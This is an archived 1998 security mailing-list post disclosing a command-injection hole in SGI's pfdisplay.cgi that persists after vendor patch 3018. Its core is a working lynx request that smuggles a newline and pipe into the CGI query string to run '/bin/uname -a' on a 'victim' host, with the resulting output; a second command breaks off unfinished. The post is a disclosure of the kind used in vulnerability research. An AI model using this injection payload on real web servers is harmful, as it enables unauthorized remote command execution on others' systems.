mailing list archives
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 7 Apr 1998 03:16:01 +0200
There is already a patch from SGI to the pfdispaly.cgi
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
$ lynx -dump \
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)